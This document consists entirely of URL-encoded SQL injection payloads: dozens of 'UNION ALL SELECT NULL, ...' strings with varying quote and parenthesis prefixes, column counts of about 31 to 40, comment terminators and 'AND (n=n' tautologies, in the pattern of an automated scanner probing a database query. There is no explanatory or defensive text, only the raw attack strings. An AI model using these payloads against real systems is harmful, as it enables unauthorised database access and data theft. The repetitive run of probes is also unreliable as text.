1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285297%3D5297 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282157%3D2157 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282849%3D2849 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282754%3D2754 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283272%3D3272 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%283061%3D3061 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%287980%3D7980 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%281428%3D1428 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282556%3D2556 1%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285104%3D5104 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285502%3D5502 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281125%3D1125 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288553%3D8553 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%288019%3D8019 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289566%3D9566 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285473%3D5473 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285856%3D5856 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%282019%3D2019 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289426%3D9426 1%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284025%3D4025 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285716%3D5716 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284974%3D4974 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285823%3D5823 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281224%3D1224 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%288909%3D8909 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287576%3D7576 